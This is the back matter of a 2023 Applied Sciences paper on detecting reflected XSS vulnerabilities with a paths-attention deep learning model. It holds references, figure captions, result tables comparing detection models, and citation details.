This research was funded by basic scientific research project of Liaoning Provincial Department of Education, (NO. LJKZ0241).

Data Availability Statement

Data source has been declared at the dataset construction stage.

Acknowledgments

We thank those anonymous reviewers whose comments/suggestions helped improve and clarify this manuscript.

Conflicts of Interest

The authors declare no conflict of interest.

References

  1. Vieira, M.; Antunes, N. Defending against web application vulnerabilities. Computer 2012, 45, 66–72. [Google Scholar]
  2. Huang, J.; Guan, X.; Li, S. Software defect prediction model based on attention mechanism. In Proceedings of the 2021 International Conference on Computer Engineering and Application (ICCEA), Kunming, China, 25–27 June 2021; IEEE: Piscataway, NJ, USA, 2021; pp. 338–345. [Google Scholar]
  3. Ni, P.; Chen, W. Detection of Reflected Cross-Site Scripting Vulnerabilities Based on Fuzzy Testing. J. Comput. Appl. 2021, 41, 2594. [Google Scholar]
  4. Wang, X.; Chen, J.; Gu, Y. Generalized graph signal sampling and reconstruction. In Proceedings of the 2015 IEEE Global Conference on Signal and Information Processing (GlobalSIP), Orlando, FL, USA, 14–16 December 2015; pp. 567–571. [Google Scholar]
  5. Kirda, E.; Jovanovic, N.; Kruegel, C. Client-side cross-site scripting protection. Comput. Secur. 2009, 28, 592–604. [Google Scholar] [CrossRef]
  6. Qin, Y. Key Technology Research and Implementation of Stored Cross-Site Scripting Vulnerabilities. Ph.D. Thesis, Beijing University of Technology, Beijing, China, 2019. [Google Scholar]
  7. Zhang, W. Research and Improvement of White Box Fuzz Testing Technology. Ph.D. Thesis, Nanjing University of Posts and Telecommunications, Nanjing, China, 2019. [Google Scholar]
  8. Simos, D.E.; Garn, B.; Zivanovic, J.; Leithner, M. Practical combinatorial testing for XSS detection using locally optimized attack models. In Proceedings of the 2019 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW), Xi’an, China, 22–23 April 2019; pp. 122–130. [Google Scholar]
  9. Liu, M.; Zhang, B.; Chen, W.; Zhang, X. A survey of exploitation and detection methods of XSS vulnerabilities. IEEE Access 2019, 7, 182004–182016. [Google Scholar] [CrossRef]
  10. Allamanis, M.; Tarlow, D.; Gordon, A.; Wei, Y. Bimodal modelling of source code and natural language. In Proceedings of the International Conference on Machine Learning, Lille, France, 6–11 July 2015; pp. 2123–2132. [Google Scholar]
  11. Gamez-Diaz, A.; Fernandez, P.; Ruiz-Cortes, A. An analysis of RESTful APIs offerings in the industry. In Proceedings of the Service-Oriented Computing: 15th International Conference, ICSOC 2017, Malaga, Spain, 13–16 November 2017; Springer: Berlin/Heidelberg, Germany; pp. 589–604. [Google Scholar]
  12. Gu, M.; Wang, D.; Zhao, W.; Fu, L. A Penetration Testing Method for XSS Vulnerabilities Based on Attack Vector Generation. Softw. Guide 2016, 15, 173–177. [Google Scholar]
  13. Sivanesan, A.P.; Mathur, A.; Javaid, A.Y. A google chromium browser extension for detecting XSS attack in html5 based websites. In Proceedings of the 2018 IEEE International Conference on Electro/Information Technology (EIT), Rochester, MI, USA, 3–5 May 2018; IEEE: Piscataway, NJ, USA, 2018; pp. 302–304. [Google Scholar]
  14. Liu, Z.; Fang, Y.; Huang, C.; Han, J. GraphXSS: An efficient XSS payload detection approach based on graph convolutional network. Comput. Secur. 2022, 114, 102597. [Google Scholar] [CrossRef]
  15. Software Assurance Reference Dataset from the National Institute of Standards and Technology (NIST). 2018. Available online: https://www.nist.gov/itl/ssd/software-quality-group/samate/software-assurance-reference-dataset-sard (accessed on 1 May 2021).
  16. Yang, L.; Wu, Y.; Wang, J.; Liu, Y. A Review of Research on Recurrent Neural Networks. Comput. Appl. 2018, 38, 1–6+26. [Google Scholar]
  17. Iyer, S.; Konstas, I.; Cheung, A.; Zettlemoyer, L. Summarizing source code using a neural attention model. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, Berlin, Germany, 7–12 August 2016; Volume 1, pp. 2073–2083. [Google Scholar]
  18. Bielik, P.; Raychev, V.; Vechev, M. PHOG: Probabilistic model for code. In Proceedings of the International Conference on Machine Learning, New York, NY, USA, 19–24 June 2016; pp. 2933–2942. [Google Scholar]
  19. Alon, U.; Zilberstein, M.; Levy, O.; Yahav, E. code2vec: Learning distributed representations of code. Proc. ACM Program. Lang. 2019, 3, 1–29. [Google Scholar] [CrossRef] [Green Version]
  20. Tsukamoto, S.; Sakai, S.; Irie, H. Detection of Reflected XSS Using Dynamic Information Flow Tracking. Res. Rep. Syst. Archit. ARC 2019, 2019, 1–6. [Google Scholar]
  21. Mishne, A.; Shoham, S.; Yahav, E. Typestate-based semantic code search over partial programs. In Proceedings of the ACM International Conference on Object Oriented Programming Systems Languages and Applications, Tucson, AZ, USA, 19–26 October 2012. [Google Scholar]
  22. Sun, H.; Cui, L.; Li, L.; Ding, Z.; Hao, Z.; Cui, J.; Liu, P. VDSimilar: Vulnerability detection based on code similarity of vulnerabilities and patches. Comput. Secur. 2021, 110, 102417. [Google Scholar] [CrossRef]
  23. Li, Q.; Wang, R.; Jia, X. Cross-site scripting detection method based on classifier and improved n-gram model in OSN. Comput. Appl. 2014, 34, 1661–1665. [Google Scholar]
  24. Dam, H.K.; Pham, T.; Ng, S.W.; Tran, T.; Grundy, J.; Ghose, A.; Kim, T.; Kim, C.-J. Lessons learned from using a deep tree-based model for software defect prediction in practice. In Proceedings of the 2019 IEEE/ACM 16th International Conference on Mining Software Repositories (MSR), Montreal, QC, Canada, 25–31 May 2019; IEEE: Piscataway, NJ, USA, 2019. [Google Scholar]
  25. Cui, L.; Hao, Z.; Jiao, Y.; Fei, H.; Yun, X. Vuldetector: Detecting vulnerabilities using weighted feature graph comparison. IEEE Trans. Inf. Forensics Secur. 2020, 16, 2004–2017. [Google Scholar] [CrossRef]
Figure 1. Flowchart of the paths-attention algorithm model.
Figure 1. Flowchart of the paths-attention algorithm model.
Applsci 13 07895 g001
Figure 2. The detection model process of tree LSTM.
Figure 2. The detection model process of tree LSTM.
Applsci 13 07895 g002
Figure 3. Siamese network detection model process.
Figure 3. Siamese network detection model process.
Applsci 13 07895 g003
Figure 4. Semantic analysis of similar code.
Figure 4. Semantic analysis of similar code.
Applsci 13 07895 g004
Figure 5. Model architecture diagram with attention mechanism.
Figure 5. Model architecture diagram with attention mechanism.
Applsci 13 07895 g005
Figure 6. Snippet of code.
Figure 6. Snippet of code.
Applsci 13 07895 g006
Figure 7. AST syntax paths and attention weights.
Figure 7. AST syntax paths and attention weights.
Applsci 13 07895 g007
Figure 8. Sample labels and vulnerability characteristics.
Figure 8. Sample labels and vulnerability characteristics.
Applsci 13 07895 g008
Figure 9. Effect of training time and F-1 score.
Figure 9. Effect of training time and F-1 score.
Applsci 13 07895 g009
Figure 10. Comparison results of the two connection modes.
Figure 10. Comparison results of the two connection modes.
Applsci 13 07895 g010
Figure 11. Time-based comparison of the two connections.
Figure 11. Time-based comparison of the two connections.
Applsci 13 07895 g011
Figure 12. Comparison of ablation results.
Figure 12. Comparison of ablation results.
Applsci 13 07895 g012
Table 1. Ratio of positive and negative samples in dataset.
Table 1. Ratio of positive and negative samples in dataset.
SourcePositive SampleNegative SampleSample Ratio
Promise database132,943700.05265%
Git Hub Open source projects478,00023260.4866%
Table 2. Comparison of model results in references.
Table 2. Comparison of model results in references.
ModelPrecisionRecallF1Prediction Rate
CNN + Attention47.329.433.90.1
LSTM + Attention [22]27.521.524.15
Paths + CRFs---10
Paths-Attention (this model)63.356.259.51000
Table 3. Evaluation of test results.
Table 3. Evaluation of test results.
ModelACCTRPFPRF-1
N-gram0.61540.10850.04270.1844
Tree-LSTM0.83020.58960.06900.6993
Siamese Network0.81170.65280.06130.7237
Paths-Attention (this model)0.90250.74510.08360.8162
Table 4. Model detection speed.
Table 4. Model detection speed.
ModelTraining Time/sTest Time/sNumber of VulnerabilitiesRate of Speed/s
N-gram1762.72541176.51
Tree-LSTM4141.72871617.09
Siamese Network2923.33311555.95
Paths-Attention (this model)2987.034317657.51
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content.

Share and Cite

MDPI and ACS Style

Tan, X.; Xu, Y.; Wu, T.; Li, B. Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method. Appl. Sci. 2023, 13, 7895. https://doi.org/10.3390/app13137895

AMA Style

Tan X, Xu Y, Wu T, Li B. Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method. Applied Sciences. 2023; 13(13):7895. https://doi.org/10.3390/app13137895

Chicago/Turabian Style

Tan, Xiaobo, Yingjie Xu, Tong Wu, and Bohan Li. 2023. "Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method" Applied Sciences 13, no. 13: 7895. https://doi.org/10.3390/app13137895

APA Style

Tan, X., Xu, Y., Wu, T., & Li, B. (2023). Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method. Applied Sciences, 13(13), 7895. https://doi.org/10.3390/app13137895

Note that from the first issue of 2016, this journal uses article numbers instead of page numbers. See further details here.

Article Metrics

Back to TopTop